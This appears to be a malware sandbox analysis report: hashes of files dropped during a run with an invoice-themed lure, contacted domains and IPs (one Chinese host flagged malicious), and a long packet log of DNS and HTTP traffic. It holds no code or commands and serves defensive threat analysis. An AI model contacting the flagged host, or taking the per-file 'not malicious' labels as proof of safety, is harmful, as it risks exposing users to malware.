C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0TZNT9WD\urlblockindex[1].bin
File Type:	data
Size (bytes):	16
Entropy (8bit):	1.6216407621868583
Encrypted:	false
MD5:	FA518E3DFAE8CA3A0E495460FD60C791
SHA1:	E4F30E49120657D37267C0162FD4A08934800C69
SHA-256:	775853600060162C4B4E5F883F9FD5A278E61C471B3EE1826396B6D129499AA7
SHA-512:	D21667F3FB081D39B579178E74E9BB1B6E9A97F2659029C165729A58F1787DC0ADADD980CD026C7A601D416665A81AC13A69E49A6A2FE2FDD0967938AA645C07
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\77PTX9DT\Paid-Invoices[1].htm
File Type:	HTML document, ASCII text
Size (bytes):	306
Entropy (8bit):	5.079939441942649
Encrypted:	false
MD5:	ABEF7DD6F634EC8024723BD3E2E7C083
SHA1:	8A7C8680BE411D4D43AFF820FF3F1713528A8733
SHA-256:	8FFAB8939EDA31E51E98D5306BA5C605008AEB477297634130F8E8AA42AA1EE2
SHA-512:	081B78F4328BB9974BC0F1B268021B03942B55DC26F51843706F5BFF228780927F3CEA7682F29DCCF35E004D0A88F496634CC753456E35968ACD8537E9FA1332
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\77PTX9DT\suggestions[1].en-US
File Type:	data
Size (bytes):	18176
Entropy (8bit):	5.525633053475079
Encrypted:	false
MD5:	5A34CB996293FDE2CB7A4AC89587393A
SHA1:	3C96C993500690D1A77873CD62BC639B3A10653F
SHA-256:	C6A5377CBC07EECE33790CFC70572E12C7A48AD8296BE25C0CC805A1F384DBAD
SHA-512:	E1B7D0107733F81937415104E70F68B1BE6FD0CA65DCCF4FF72637943D44278D3A77F704AEDFF59D2DBC0D56A609B2590C8EC0DD6BC48AB30F1DAD0C07A0A3EE
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DEWWYACU\favicon[1].ico
File Type:	PNG image data, 16 x 16, 4-bit colormap, non-interlaced
Size (bytes):	237
Entropy (8bit):	6.1480026084285395
Encrypted:	false
MD5:	9FB559A691078558E77D6848202F6541
SHA1:	EA13848D33C2C7F4F4BAA39348AEB1DBFAD3DF31
SHA-256:	6D8A01DC7647BC218D003B58FE04049E24A9359900B7E0CEBAE76EDF85B8B914
SHA-512:	0E08938568CD123BE8A20B87D9A3AAF5CB05249DE7F8286FF99D3FA35FC7AF7A9D9797DD6EFB6D1E722147DCFB74437DE520395234D0009D452FB96A8ECE236B
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DEWWYACU\iecompatviewlist[1].xml
File Type:	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Size (bytes):	385969
Entropy (8bit):	5.1316299112770425
Encrypted:	false
MD5:	89D7FDB3DE0C78F96B40030205EFB616
SHA1:	EAEF1812481E918FD73AFDDF27DB2D5446CD1884
SHA-256:	0E0F38D35FC640DBDE485A53B6EC2EE1ADB25C5602DCF9EC77EA272E9B3F611B
SHA-512:	63971D6FB7958B69E20BC08091CF9123232D5AEE285027D826572563B4BD3292E5A94C232A4FD0CE62F88172327838110B86A933E717E9BD7AEBDE01307DE876
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{91144EB3-64E7-4A65-B624-44A959EFB2DA}.tmp
File Type:	FoxPro FPT, blocks size 0, next free block index 218103808, 1st used item "\375"
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
File Type:	data
Size (bytes):	162
Entropy (8bit):	1.982280142788856
Encrypted:	false
MD5:	FF291ADF1F74826EE3AA31EA36ADEC1C
SHA1:	9E647BCB57789C91D08C9B02D73ECD048239B5C5
SHA-256:	08B022FE12FDA6C82FEEA4C0B2736E6FF757EA90DFF28CE43E7D44CD5FB4AE36
SHA-512:	A4CCFF54304DBB44144FFF7EF0027A3DE88B66CBEE24158162D30BC8ED4E8A4D3476645E1F5B76F86BAADB18EF9867116F900B671F7951B5FCC39BABB319C5A2
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZE3YFSGZQU9DG4TLO4IO.temp
File Type:	data
Size (bytes):	8016
Entropy (8bit):	3.5790663742697024
Encrypted:	false
MD5:	C85E0E72B002BC42E3121DA803308A74
SHA1:	91F11A55C4C4DE6FDE8A40C6DEE09701B1F84DDB
SHA-256:	3830780728271003DC8503980537432781C6C00214B3AB6904468330393048E9
SHA-512:	E8D77A7D359BC5851BB26FEE4C55CE09F21422E6C4424605ED88066D25A7D09A2A9A7CA2ED791DF57B7AF90D81C30EC1F3C8CA81EEC57B400543844BD67B8F42
Malicious:	false
Reputation:	low

\samr
File Type:	Hitachi SH big-endian COFF object, not stripped
Size (bytes):	116
Entropy (8bit):	4.053374040827533
Encrypted:	false
MD5:	080E701E8B8E2E9C68203C150AC7C6B7
SHA1:	4EF041621388B805758AE1D3B122F9D364705223
SHA-256:	FE129AE2A7C96708754F6F51091E6E512C9FEACA1042A1E9DB914C651FEB344D
SHA-512:	C11D88B8E355B7B922B985802464B693F75BA4C2A62F9137A15842CA82F9B6B3ED13059EDC0DF1C04E7DE43719D892B4C0D22BB67BE0D57EAB368BA1BC057E79
Malicious:	false
Reputation:	low

Contacted Domains/Contacted IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection
royal-tec.com	50.63.111.1	true	false	0%, virustotal, Browse
www.norsterra.cn	203.195.212.211	true	true

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

IP	Country	ASN	ASN Name	Malicious
50.63.111.1	United States	26496	AS-26496-GO-DADDY-COM-LLC-GoDaddycomLLCUS	false
8.8.8.8	United States	15169	GOOGLE-GoogleIncUS	false
203.195.212.211	China	45090	CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompa	true

Static File Info

No static file info

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 12, 2018 21:34:28.263108969 CET	59605	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:29.258646965 CET	59605	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:29.433412075 CET	50900	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:29.437674046 CET	51075	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:29.441893101 CET	61674	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:29.445734978 CET	59291	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:29.449625969 CET	63053	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:29.453346968 CET	60812	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:30.260154009 CET	59605	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:30.430011988 CET	50900	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:30.430290937 CET	51075	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:30.440501928 CET	59291	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:30.440679073 CET	61674	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:30.450293064 CET	60812	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:30.450542927 CET	63053	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:31.117657900 CET	53	61674	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:31.402072906 CET	53	51075	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:31.402118921 CET	53	50900	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:31.772726059 CET	53	59291	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:31.772772074 CET	53	63053	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:31.894151926 CET	59291	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:31.894222975 CET	63053	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:31.894321918 CET	60812	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:31.898345947 CET	50900	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:31.898458004 CET	51075	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:32.263147116 CET	59605	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:32.371428967 CET	53	60812	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:32.644903898 CET	53	50900	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:33.123464108 CET	58523	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:33.392586946 CET	53	51075	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:33.711498976 CET	53	59291	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:33.711538076 CET	53	61674	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:34.115494013 CET	58523	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:34.127120018 CET	53	60812	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:34.127162933 CET	53	63053	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:34.868956089 CET	53	59291	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:35.117594957 CET	58523	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:35.264612913 CET	53	59605	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:35.264658928 CET	53	59605	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:35.264678955 CET	53	59605	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:35.293196917 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:35.293224096 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:35.293564081 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:35.294054985 CET	49165	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:35.294075012 CET	80	49165	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:35.294437885 CET	49165	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:35.295146942 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:35.295164108 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:35.618851900 CET	53	63053	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:35.618896008 CET	53	60812	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:35.618921995 CET	53	50900	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:35.618943930 CET	53	51075	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:35.999469042 CET	53	59605	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:36.596257925 CET	53	58523	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:36.930929899 CET	53	58523	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:37.371037006 CET	53	58523	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:38.917526960 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:38.917730093 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:38.991863966 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:38.991890907 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:41.664854050 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:41.664874077 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:41.664880991 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:41.664995909 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:41.679538012 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:41.679660082 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:41.984241009 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:41.984258890 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:41.984266996 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:41.984611034 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:42.251990080 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:42.252258062 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:42.487931967 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:42.487951040 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:42.487958908 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:42.488152027 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:42.789205074 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:42.789426088 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:43.058412075 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:43.058432102 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:43.058439970 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:43.058525085 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:43.278562069 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:43.278582096 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:43.278589964 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:43.278791904 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:43.498984098 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:43.499003887 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:43.499011993 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:43.499209881 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:43.779247999 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:43.779546976 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:44.036324978 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:44.036350012 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:44.036361933 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:44.036418915 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:44.036956072 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:44.222073078 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:44.222191095 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:44.403948069 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:44.403964996 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:44.403971910 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:44.404051065 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:44.567539930 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:44.567656040 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:44.811919928 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:44.812019110 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:45.042202950 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:45.042217016 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:45.042223930 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:45.042346954 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:45.202423096 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:45.202435017 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:45.202440023 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:45.202609062 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:45.357075930 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:45.357326984 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:45.506073952 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:45.506093025 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:45.506100893 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:45.506345987 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:45.730964899 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:45.731545925 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:45.918133974 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:45.918158054 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:45.918165922 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:45.918448925 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:46.068814039 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:46.069073915 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:46.198036909 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:46.198369980 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:46.322797060 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:46.322815895 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:46.322824001 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:46.322978973 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:46.453392029 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:46.453411102 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:46.453418970 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:46.453622103 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:46.658477068 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:46.658759117 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:46.814259052 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:46.814279079 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:46.814285994 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:46.814510107 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:46.945625067 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:46.945926905 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:47.035446882 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:47.035665989 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:47.142412901 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:47.142431974 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:47.142440081 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:47.142601967 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:47.247836113 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:47.247855902 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:47.247864008 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:47.248142004 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:47.353288889 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:47.353718996 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:47.472235918 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:47.472255945 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:47.472263098 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:47.472520113 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:47.655205965 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:47.655545950 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:47.821666002 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:47.821682930 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:47.821690083 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:47.821997881 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:47.970300913 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:47.970475912 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:48.093269110 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:48.093287945 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:48.093295097 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:48.093444109 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:48.221769094 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:48.221786976 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:48.221793890 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:48.222028971 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:48.319355965 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:48.319571018 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:48.431687117 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:48.431704998 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:48.431711912 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:48.431963921 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:48.622967005 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:48.623224974 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:48.802484989 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:48.802505016 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:48.802512884 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:48.802678108 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:48.931785107 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:48.931993008 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:49.064992905 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:49.065222979 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:49.197524071 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:49.197551966 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:49.197562933 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:49.197789907 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:49.327433109 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:49.327452898 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:49.327461004 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:49.327686071 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:49.438508034 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:49.438765049 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:49.642442942 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:49.642450094 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:49.642462969 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:49.642839909 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:49.788355112 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:49.788513899 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:49.910339117 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:49.910357952 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:49.910366058 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:49.910617113 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:49.997443914 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:49.997720957 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:50.097146034 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:50.097619057 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:50.193311930 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:50.193331957 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:50.193339109 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:50.193619013 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:50.291908979 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:50.291927099 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:50.291934013 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:50.292169094 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:50.387743950 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:50.387928963 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:50.477685928 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:50.478130102 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:50.646565914 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:50.646585941 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:50.646593094 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:50.646863937 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:50.776503086 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:50.776520967 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:50.776529074 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:50.776729107 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:50.878005981 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:50.878293991 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:50.987605095 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:50.987628937 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:50.987638950 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:50.987790108 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:51.083276033 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:51.083446980 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:51.171859026 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:51.171881914 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:51.172051907 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:51.666781902 CET	80	49164	50.63.111.1	192.168.2.2
Feb 12, 2018 21:34:51.667125940 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:34:53.547003031 CET	65490	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:53.816781044 CET	60652	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:54.545306921 CET	65490	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:54.815648079 CET	60652	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:54.955754995 CET	57729	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:55.125817060 CET	65311	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:55.301521063 CET	53	57729	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:55.546340942 CET	65490	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:55.816634893 CET	60652	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:55.980210066 CET	53	65311	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:57.330471992 CET	50323	53	192.168.2.2	8.8.8.8
